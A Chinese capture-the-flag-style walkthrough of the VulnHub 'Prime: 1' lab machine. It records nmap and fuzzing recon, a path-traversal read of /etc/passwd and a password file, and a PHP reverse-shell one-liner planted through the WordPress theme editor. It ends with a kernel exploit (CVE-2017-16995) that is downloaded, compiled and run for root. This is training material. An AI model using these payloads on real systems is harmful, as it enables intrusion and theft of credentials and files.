网安打靶篇-Prime:1
靶机地址 [Prime: 1 \~ VulnHub]
前置知识
OpenSSL
OpenSSL 提供了多种加密算法和协议,通常需要一个十六进制格式的密钥(KEY)、待加密的明文数据、指定的加密算法,以及可选的初始化向量(IV)和编码操作(如 Base64 编码),以便完成加密和解密操作。
加密模版
echo -n "[字符串]" | openssl enc -[加密类型] -K [16进制Hex的KEY值] -iv [16进制Hex的IV值] -base64解密模版
echo -n "[被加密的字符串]" | openssl enc -d -[加密类型] -K [16进制Hex的KEY值] -iv [16进制Hex的IV值] -base64指令解析
- -enc:指定加密操作。
- -[加密类型]:替换为所需的加密算法,例如 aes-256-cbc、aes-128-cbc、des 等。
- -K [16进制Hex的KEY值]:替换为 16 进制格式的密钥(KEY),例如 0123456789abcdef0123456789abcdef(32 个十六进制字符用于 AES-256)。
- -iv [16进制Hex的IV值]:替换为 16 进制格式的初始化向量(IV),例如 abcdef9876543210(16 个十六进制字符)。
查看 OpenSSL 帮助文档,其中Message Digest commands和Cipher commands均为加密算法
┌──(root㉿Kali)-[~/nmapscan]
└─# openssl --help
help:
Standard commands
asn1parse ca ciphers cmp
cms crl crl2pkcs7 dgst
dhparam dsa dsaparam ec
ecparam enc engine errstr
fipsinstall gendsa genpkey genrsa
help info kdf list
mac nseq ocsp passwd
pkcs12 pkcs7 pkcs8 pkey
pkeyparam pkeyutl prime rand
rehash req rsa rsautl
s_client s_server s_time sess_id
smime speed spkac srp
storeutl ts verify version
x509
Message Digest commands (see the `dgst' command for more details)
blake2b512 blake2s256 md4 md5
rmd160 sha1 sha224 sha256
sha3-224 sha3-256 sha3-384 sha3-512
sha384 sha512 sha512-224 sha512-256
shake128 shake256 sm3
Cipher commands (see the `enc' command for more details)
aes-128-cbc aes-128-ecb aes-192-cbc aes-192-ecb
aes-256-cbc aes-256-ecb aria-128-cbc aria-128-cfb
aria-128-cfb1 aria-128-cfb8 aria-128-ctr aria-128-ecb
aria-128-ofb aria-192-cbc aria-192-cfb aria-192-cfb1
aria-192-cfb8 aria-192-ctr aria-192-ecb aria-192-ofb
aria-256-cbc aria-256-cfb aria-256-cfb1 aria-256-cfb8
aria-256-ctr aria-256-ecb aria-256-ofb base64
bf bf-cbc bf-cfb bf-ecb
bf-ofb camellia-128-cbc camellia-128-ecb camellia-192-cbc
camellia-192-ecb camellia-256-cbc camellia-256-ecb cast
cast-cbc cast5-cbc cast5-cfb cast5-ecb
cast5-ofb des des-cbc des-cfb
des-ecb des-ede des-ede-cbc des-ede-cfb
des-ede-ofb des-ede3 des-ede3-cbc des-ede3-cfb
des-ede3-ofb des-ofb des3 desx
rc2 rc2-40-cbc rc2-64-cbc rc2-cbc
rc2-cfb rc2-ecb rc2-ofb rc4
rc4-40 seed seed-cbc seed-cfb
seed-ecb seed-ofb sm4-cbc sm4-cfb
sm4-ctr sm4-ecb sm4-ofb zlib
zstdOD
od(octal dump)是 Linux 和 Unix 系统中的一个命令行工具,用于以八进制、十六进制或其他格式显示文件的内容。它通常用于查看二进制文件的内容,帮助用户分析文件的结构或调试程序。
进制转换示例
将字符串转换为八进制
将字符串转换为二进制
- -A:指定输出地址的格式。可以是 n(不输出地址)、o(八进制)、x(十六进制)、d(十进制)等。
- -t:指定输出格式。可以是:
- o:八进制
- x:十六进制
- d:十进制
- c:字符
- s:字符串
- f:浮点数
- -N:指定读取的字节数。
- -v:显示所有输出,包括重复的行。
- -h:以人类可读的格式显示输出。
NMAP 扫描
扫描端口不要进行版本检测等各种较为深度的扫描,目的是为了尽可能避免服务器防火墙或管理员发现,获取到端口之后进行详细扫,先端口后服务的扫描方式可以减少扫描发送的数据包,并且扫描UDP端口以及使用漏洞脚本扫描,这样可以做到不遗漏不敏感的目的。如果IPv4的攻击向量太少可以尝试用IPv6扫描
1.主机发现
┌──(root㉿Kali)-[~/nmapscan]
└─# nmap -sn 192.168.248.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 17:18 CST
Nmap scan report for 192.168.248.1 (192.168.248.1)
Host is up (0.00013s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.248.2 (192.168.248.2)
Host is up (0.000082s latency).
MAC Address: 00:50:56:F1:23:CB (VMware)
Nmap scan report for 192.168.248.134 (192.168.248.134)
Host is up (0.000096s latency).
MAC Address: 00:0C:29:EB:A5:7C (VMware)
Nmap scan report for 192.168.248.254 (192.168.248.254)
Host is up (0.000089s latency).
MAC Address: 00:50:56:EE:EA:C4 (VMware)
Nmap scan report for 192.168.248.131 (192.168.248.131)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.93 seconds
确定靶机IP192.168.248.134
2.端口扫描
使用最低速率10000进行端口扫描
┌──(root㉿Kali)-[~/nmapscan]
└─# nmap --min-rate 10000 -p- 192.168.248.134 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 17:50 CST
Nmap scan report for 192.168.248.134 (192.168.248.134)
Host is up (0.00086s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:EB:A5:7C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds使用UDP协议进行端口扫描
┌──(root㉿Kali)-[~/nmapscan]
└─# nmap -sU --min-rate 10000 -p- 192.168.248.134 -oA udp
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 17:51 CST
Warning: 192.168.248.134 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.248.134 (192.168.248.134)
Host is up (0.00092s latency).
All 65535 scanned ports on 192.168.248.134 (192.168.248.134) are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:EB:A5:7C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 72.98 seconds3. 服务扫描
使用TCP全连接的方式探测上方扫描出来的端口,识别服务版本号以及服务器操作系统
┌──(root㉿Kali)-[~/nmapscan]
└─# nmap -sT -sV -O -p22,80 192.168.248.134 -oA detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 18:22 CST
Nmap scan report for 192.168.248.134 (192.168.248.134)
Host is up (0.00044s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:0C:29:EB:A5:7C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.63 seconds使用漏洞脚本进行扫描
┌──(root㉿Kali)-[~/nmapscan]
└─# nmap -sT --script=vuln -p22,80 192.168.248.134 -oA vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 17:58 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.248.134 (192.168.248.134)
Host is up (0.0017s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-enum:
| /wordpress/: Blog
|_ /wordpress/wp-login.php: WordPress login page.
MAC Address: 00:0C:29:EB:A5:7C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 344.97 seconds结果分析
22端口 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80端口 Apache httpd 2.4.18 ((Ubuntu))WEB 渗透
目录爆破
┌──(root㉿Kali)-[~/nmapscan]
└─# dirb http://192.168.248.134/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Dec 18 17:58:48 2024
URL_BASE: http://192.168.248.134/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.248.134/ ----
+ http://192.168.248.134/dev (CODE:200|SIZE:131)
+ http://192.168.248.134/index.php (CODE:200|SIZE:136)
==> DIRECTORY: http://192.168.248.134/javascript/
+ http://192.168.248.134/server-status (CODE:403|SIZE:303)
==> DIRECTORY: http://192.168.248.134/wordpress/
---- Entering directory: http://192.168.248.134/javascript/ ----
==> DIRECTORY: http://192.168.248.134/javascript/jquery/
---- Entering directory: http://192.168.248.134/wordpress/ ----
+ http://192.168.248.134/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.248.134/wordpress/wp-admin/
==> DIRECTORY: http://192.168.248.134/wordpress/wp-content/
==> DIRECTORY: http://192.168.248.134/wordpress/wp-includes/
+ http://192.168.248.134/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.248.134/javascript/jquery/ ----
+ http://192.168.248.134/javascript/jquery/jquery (CODE:200|SIZE:284394)
---- Entering directory: http://192.168.248.134/wordpress/wp-admin/ ----
+ http://192.168.248.134/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.248.134/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.248.134/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.248.134/wordpress/wp-admin/includes/
+ http://192.168.248.134/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.248.134/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.248.134/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.248.134/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.248.134/wordpress/wp-admin/user/
---- Entering directory: http://192.168.248.134/wordpress/wp-content/ ----
+ http://192.168.248.134/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.248.134/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.248.134/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.248.134/wordpress/wp-content/uploads/
---- Entering directory: http://192.168.248.134/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.248.134/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.248.134/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.248.134/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.248.134/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.248.134/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.248.134/wordpress/wp-admin/network/ ----
+ http://192.168.248.134/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.248.134/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.248.134/wordpress/wp-admin/user/ ----
+ http://192.168.248.134/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.248.134/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.248.134/wordpress/wp-content/plugins/ ----
+ http://192.168.248.134/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.248.134/wordpress/wp-content/themes/ ----
+ http://192.168.248.134/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.248.134/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Dec 18 17:59:17 2024
DOWNLOADED: 46120 - FOUND: 15访问:http://192.168.248.134/dev
hello,
now you are at level 0 stage.
In real life pentesting we should use our tools to dig on a web very hard.
Happy hacking.你好、
现在您处于 0 级阶段。
在实际的五项测试中,我们应该使用我们的工具对网络进行深入挖掘。
黑客快乐访问:http://192.168.248.134/
查看网页源码,没什么收获
<img src="hacknpentest.png" alt="hnp security" width="1300" height="595">访问:http://192.168.248.134/wordpress/
随便点几个文章,发现用户信息victor,可能会用到爆破测试中
根据dev中提示,进行深入挖掘,尝试进行模糊匹配扫描
模糊扫描
扫描zip和txt文件,因为wp的网站文件均为php或html,这样能够扫到其他文件
┌──(root㉿Kali)-[~/nmapscan]
└─# dirb http://192.168.248.134/ -X .zip,.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Dec 18 18:38:26 2024
URL_BASE: http://192.168.248.134/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.zip,.txt) | (.zip)(.txt) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.248.134/ ----
+ http://192.168.248.134/secret.txt (CODE:200|SIZE:412)
-----------------
END_TIME: Wed Dec 18 18:38:32 2024
DOWNLOADED: 9224 - FOUND: 1访问:http://192.168.248.134/secret.txt
Looks like you have got some secrets.
Ok I just want to do some help to you.
Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck
Learn from here a basic tool with good usage for OSCP.
https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
//see the location.txt and you will get your next move//看来你有一些秘密。
好吧,我只是想帮你一把。
在你找到的 php 的每个页面上再做一些模糊处理。如果
得到任何正确的参数,请按照以下步骤操作。如果您仍然卡住
请从这里了解 OSCP 的基本使用工具。
https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
//查看 location.txt,你就会知道下一步该怎么做//根据提示进行扫描php文件
┌──(root㉿Kali)-[~/nmapscan]
└─# dirb http://192.168.248.134 -X .php -o report/dirbphp.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: report/dirbphp.txt
START_TIME: Wed Dec 18 18:46:54 2024
URL_BASE: http://192.168.248.134/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.248.134/ ----
+ http://192.168.248.134/image.php (CODE:200|SIZE:147)
+ http://192.168.248.134/index.php (CODE:200|SIZE:136)
-----------------
END_TIME: Wed Dec 18 18:46:57 2024
DOWNLOADED: 4612 - FOUND: 2对扫描出来的结果进行模糊测试
┌──(root㉿Kali)-[~/nmapscan]
└─# wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.248.134/index.php?FUZZ=something
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.248.134/index.php?FUZZ=something
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000341: 200 7 L 19 W 206 Ch "file"
Total time: 0.688222
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 1381.820访问 http://192.168.248.134/index.php?file
<html><head><title>HacknPentest</title>
</head><body>
<img src="hacknpentest.png" alt="hnp security" width="1300" height="595">
Do something better <br><br><br><br><br><br>you are digging wrong file
</body></html>干的漂亮 你挖错了文件根据提示,访问http://192.168.248.134/index.php?file=location.txt
Do something better
ok well Now you reah at the exact parameter
Now dig some more for next one
use 'secrettier360' parameter on some other php page for more fun.做得更好
好了,现在你找到准确的参数了
现在再挖掘下一个
在其他 php 页面使用 “secrettier360 ”参数,以获得更多乐趣。根据提示进行参数值匹配
┌──(root㉿Kali)-[~/nmapscan]
└─# wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 17 http://192.168.248.134/image.php?secrettier360=FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.248.134/image.php?secrettier360=FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000257: 200 13 L 43 W 328 Ch "dev"
Total time: 0
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 0访问http://192.168.248.134/image.php?secrettier360=dev
finaly you got the right parameter
hello, now you are at level 0 stage. In real life pentesting we should use our tools to dig on a web very hard. Happy hacking.您终于获得了正确的参数
您好,现在您处于 0 级阶段。在实际的五项测试中,我们应该使用我们的工具对网络进行深入挖掘。黑客快乐发现文件包含了dev文件,存在任意文件读取漏洞
漏洞利用
利用漏洞尝试读取`/etc/passwd`
┌──(root㉿Kali)-[~/nmapscan]
└─# curl http://192.168.248.134/image.php?secrettier360=../../../../../../../../etc/passwd
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
</html>提取有bash权限的,以及有提示的信息
root:x:0:0:root:/root:/bin/bash
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
saket:x:1001:1001:find password.txt file in my directory:/home/saket:利用漏洞访问saket密码文件/home/saket/password.txt
┌──(root㉿Kali)-[~/nmapscan]
└─# curl http://192.168.248.134/image.php?secrettier360=../../../../../../../../home/saket/password.txt
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>follow_the_ippsec
</html>follow_the_ippsec尝试登录ssh
┌──(root㉿Kali)-[~/nmapscan]
└─# ssh saket@192.168.248.134
The authenticity of host '192.168.248.134 (192.168.248.134)' can't be established.
ED25519 key fingerprint is SHA256:j4BjjDNA4iDRgwl0m3uHtlNdQm8M97LMWuNBsgHbxt0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.248.134' (ED25519) to the list of known hosts.
saket@192.168.248.134's password:
Permission denied, please try again.
saket@192.168.248.134's password:
Permission denied, please try again.
saket@192.168.248.134's password:登录失败
获取后台权限
尝试登录网站管理后台http://192.168.248.134/wordpress/wp-admin/,上方进行目录爆破时获取到网站中存在用户`victor`
账号`victor` 密码`follow_the_ippsec`,登录成功
找到上传点http://192.168.248.134/wordpress/wp-admin/theme-editor.php?file=secret.php&theme=twentynineteen
使用PHP一句话木马,反弹Shell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.248.131/443 0>&1'"); ?>kali开启监听后,访问http://192.168.248.134/wordpress/wp-content/themes/twentynineteen/secret.php
┌──(root㉿Kali)-[~/nmapscan]
└─# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.248.131] from (UNKNOWN) [192.168.248.134] 51734
bash: cannot set terminal process group (1422): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ whoami
<ml/wordpress/wp-content/themes/twentynineteen$ whoami
www-data
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ ls
ls
404.php
archive.php
classes
comments.php
fonts
footer.php
functions.php
header.php
image.php
inc
index.php
js
package-lock.json
package.json
page.php
postcss.config.js
print.css
print.scss
readme.txt
sass
screenshot.png
search.php
secret.php
single.php
style-editor-customizer.css
style-editor-customizer.scss
style-editor.css
style-editor.scss
style-rtl.css
style.css
style.scss
template-parts
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ sudo -l
<ml/wordpress/wp-content/themes/twentynineteen$ sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(root) NOPASSWD: /home/saket/enc
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ uname -a
<ml/wordpress/wp-content/themes/twentynineteen$ uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$根据信息分析,存在两种方式进行提权:
第一种是由于靶机内核版本太低,内核漏洞提权
第二种是提示信息`/home/saket/enc`,OpenSSL解密提权
一般不推荐使用内核提权,会导致系统服务中断被管理员发现
内核提权
搜索内核版本可利用脚本
┌──(root㉿Kali)-[~/nmapscan]
└─# searchsploit Linux ubuntu 4.10.0-28
---------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation | linux/local/41760.txt
---------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results┌──(root㉿Kali)-[~/nmapscan]
└─# searchsploit Linux ubuntu 4.10.0-28 -m linux/local/45010.c
[!] Could not find EDB-ID #
[!] Could not find EDB-ID #
Exploit: Sun SUNWlldap Library Hostname - Local Buffer Overflow
URL: https://www.exploit-db.com/exploits/4
Path: /usr/share/exploitdb/exploits/solaris/local/4.c
Codes: OSVDB-15148, CVE-2003-1055
Verified: True
File Type: C source, ASCII text
Copied to: /root/nmapscan/4.c
Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/45010
Path: /usr/share/exploitdb/exploits/linux/local/45010.c
Codes: CVE-2017-16995
Verified: True
File Type: C source, ASCII text
Copied to: /root/nmapscan/45010.c查看提权源码
┌──(root㉿Kali)-[~/nmapscan]
└─# cat 45010.c
/*
Credit @bleidl, this is a slight modification to his original POC
https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c
For details on how the exploit works, please visit
https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Tested on Ubuntu 16.04 with the following Kernels
4.4.0-31-generic
4.4.0-62-generic
4.4.0-81-generic
4.4.0-116-generic
4.8.0-58-generic
4.10.0.42-generic
4.13.0-21-generic
Tested on Fedora 27
4.13.9-300
gcc cve-2017-16995.c -o cve-2017-16995
internet@client:~/cve-2017-16995$ ./cve-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880038c3f500
[*] Leaking sock struct from ffff88003af5e180
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880038704600
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880038704600
[*] credentials patched, launching shell...
#id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(internet)
*/kali启动一个Http服务,用于传输提权利用脚本
┌──(root㉿Kali)-[~/nmapscan]
└─# php -S 0:80
[Wed Dec 18 22:12:26 2024] PHP 8.2.21 Development Server (http://0:80) started下载利用脚本,编译并运行
www-data@ubuntu:/home$ cd /tmp
cd /tmp
www-data@ubuntu:/tmp$ wget http://192.168.248.131/45010
wget http://192.168.248.131/45010
--2024-12-18 06:14:11-- http://192.168.248.131/45010
Connecting to 192.168.248.131:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21616 (21K)
Saving to: '45010'
0K .......... .......... . 100% 138M=0s
2024-12-18 06:14:11 (138 MB/s) - '45010' saved [21616/21616]
www-data@ubuntu:/tmp$ ls
ls
45010
VMwareDnD
systemd-private-8740a19667584938855afafb4c1c2a3f-colord.service-YJZ2jh
systemd-private-8740a19667584938855afafb4c1c2a3f-rtkit-daemon.service-famTNO
systemd-private-8740a19667584938855afafb4c1c2a3f-systemd-timesyncd.service-dIYR18
vmware-root
www-data@ubuntu:/tmp$ wget http://192.168.248.131/45010.c
wget http://192.168.248.131/45010.c
--2024-12-18 06:15:15-- http://192.168.248.131/45010.c
Connecting to 192.168.248.131:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13176 (13K) [text/x-c]
Saving to: '45010.c'
0K .......... .. 100% 390M=0s
2024-12-18 06:15:15 (390 MB/s) - '45010.c' saved [13176/13176]
www-data@ubuntu:/tmp$ gcc 45010.c -o getshell
gcc 45010.c -o getshell
www-data@ubuntu:/tmp$ chmod +x getshell
chmod +x getshell
www-data@ubuntu:/tmp$ ./getshell
./getshell
whami
/bin/sh: 1: whami: not found
whoami
root
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:eb:a5:7c brd ff:ff:ff:ff:ff:ff
inet 192.168.248.134/24 brd 192.168.248.255 scope global dynamic ens33
valid_lft 990sec preferred_lft 990sec
inet6 fe80::57e8:dc54:3bcd:712a/64 scope link
valid_lft forever preferred_lft forever查看是否存在python环境,用于终端升级
dpkg -lpython -c"import pty;pty.spawn('/bin/bash')"
root@ubuntu:/tmp# ls
ls
45010
45010.c
VMwareDnD
getshell
